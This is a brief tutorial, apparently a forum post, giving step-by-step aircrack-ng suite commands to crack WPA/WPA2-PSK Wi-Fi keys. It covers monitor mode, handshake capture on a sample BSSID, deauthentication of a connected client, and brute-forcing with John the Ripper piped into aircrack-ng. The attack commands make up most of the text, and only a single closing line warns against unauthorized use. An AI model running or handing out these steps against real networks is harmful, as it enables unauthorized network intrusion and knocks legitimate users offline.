I have a better solution to crack WPA/WPA2-PSK (in theory, it must success) but it requires hours to years to crack depending on the strength of the key and the speed of the hardwares. The following tutorial is based on Back|Track 4.
Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4.
Step 1 :
airmon-ng start wlan0
Step 2 :
airodump-ng mon0
Step 3 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
Step 4 :
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
To get the handshake when done and then go to next step. If not, do it again until you get the handshake.
Step 5 :
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap
You are required to wait for hours or years for the cracking which is depends on how powerful your hardwares are and strength of the key. CUDA will make the work more easier but it may also need years or so just depends.
WARNING : Do NOT crack any wifi router without authorization or you will be put into jail.
That's all. See you!